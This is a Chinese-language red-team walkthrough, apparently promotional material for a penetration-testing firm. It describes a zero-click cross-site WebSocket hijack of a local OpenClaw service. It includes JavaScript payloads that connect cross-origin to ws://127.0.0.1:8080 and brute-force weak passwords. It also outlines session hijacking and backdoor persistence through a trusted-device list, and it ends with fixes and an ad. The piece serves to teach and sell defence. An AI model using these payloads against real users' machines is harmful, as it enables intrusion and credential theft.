从浏览器到内网：一次针对OpenClaw的零点击跨域劫持实战演练

OpenClaw作为企业内部常用的AI任务管理平台，其本地WebSocket服务常被用于设备与平台的实时交互。然而，若服务配置存在缺陷，攻击者可通过浏览器端的跨域漏洞，从外部恶意网站渗透至内网，实现设备接管。本文以红队视角，模拟完整攻击链，揭示这类隐蔽风险的利用路径，并引入专业渗透测试服务作为解决方案。

一、信息收集：划定攻击面

1. 入口分析

攻击入口锁定为用户访问恶意网站——当受害者打开含恶意代码的页面时，浏览器将成为攻击者的“跳板”，目标直指其本地运行的OpenClaw服务。

2. 服务探测

OpenClaw的WebSocket服务通常绑定本地端口。我们通过梳理常见本地端口列表（如8080、8888），结合公开文档中的默认配置，最终定位到目标地址：ws://127.0.0.1:8080。

关键洞察：这类本地服务的暴露风险常被企业忽视，常规扫描工具难以覆盖内部服务的安全配置。而天磊卫士渗透测试服务覆盖PC端软件（基于HTTP/HTTPS协议的程序），无论部署于本地机房还是云端，均可精准识别这类隐蔽攻击面。

二、漏洞验证：突破同源策略的“例外”

1. 搭建恶意站点

在VPS上部署包含恶意JS的HTML页面，核心逻辑是尝试与本地OpenClaw建立跨域WebSocket连接。

2. Payload设计

<script>
  const ws = new WebSocket('ws://127.0.0.1:8080');
  ws.onopen = () => console.log('跨域连接成功！Origin验证缺失');
  ws.onerror = (err) => console.log('连接失败：', err);
</script>

当受害者访问页面时，若OpenClaw未验证Origin头（允许任意域连接），onopen事件触发——同源策略被绕过。

专业视角：这类Origin验证缺失的逻辑漏洞，是自动化扫描工具难以捕捉的深层次隐患。天磊卫士渗透测试强调实战性与攻击者视角，能还原真实攻击场景，验证漏洞的实际利用可能性（如技术原理所述：揭示扫描无法发现的隐蔽性风险）。其服务范围覆盖Web相关应用（含恶意站点攻击载体分析），全面评估外部攻击风险。

三、权限提升：从连接到控制

1. 爆破挑战

OpenClaw的WebSocket登录接口未设置速率限制，我们编写JS脚本爆破弱口令：

<script>
  const passwords = ['admin', '123456', 'root'];
  let current = 0;
  function tryLogin(pwd) {
    const ws = new WebSocket('ws://127.0.0.1:8080');
    ws.onopen = () => ws.send(JSON.stringify({action: 'login', pwd}));
    ws.onmessage = (e) => {
      if (JSON.parse(e.data).status === 'success') {
        console.log('爆破成功！密码：', pwd);
        // 会话维持操作
      }
    };
  }
  setInterval(() => {
    if (current < passwords.length) tryLogin(passwords[current++]);
  }, 100);
</script>

短时间内即可获取有效密码。

安全启示：身份认证缺陷（暴力破解）是天磊卫士常见检测的漏洞类型。其核心团队持有CISP-PTE等权威认证，能精准发现这类无速率限制的风险，并验证利用可能性。

2. 会话维持

• 劫持Session：通过有效密码获取会话Token，接管控制台；

• 后门植入：调用API将攻击者设备ID添加至“受信任列表”，实现长期潜伏。

四、攻击成果与报告

1. 权限影响

成功获取OpenClaw控制台权限，可执行任意AI指令、读取本地敏感数据（如企业文档、用户凭证），并通过内网横向移动至其他设备。

2. 渗透测试报告重点

一份专业报告需包含：

• 攻击时间线：信息收集→漏洞验证→权限提升→维持；

• 漏洞逻辑：Origin验证缺失（零日级逻辑漏洞）；

• 绕过机制：同源策略预期失效。

天磊卫士报告优势：

参考OWASP Testing Guide v4、GB/T 36627-2018等标准，输出合规报告；可加盖CNAS、CMA双章（证书编号：232121010409），具备司法采信基础。报告提供可落地的修复方案，如：

• 强制验证WebSocket连接的Origin头；

• 增加登录速率限制与验证码；

• 强化受信任设备的身份验证。

结语

本次演练揭示了从浏览器到内网的隐蔽攻击路径，核心在于本地服务的配置缺陷。企业需通过专业渗透测试提前防范这类风险。

天磊卫士作为国家高新技术企业，具备CCRC（证书编号：CCRC-2022-ISV-RA-1699/1648）、ITSEC等权威资质，核心团队持有CISSP等认证，提供全生命周期的安全托管与合规保障。如需了解更多，可访问官网www.tlaigc.com，或联系400-070-7035、19075698354（微信同号）。

让企业的数字化转型更安全、更合规、更可持续——这是天磊卫士的使命。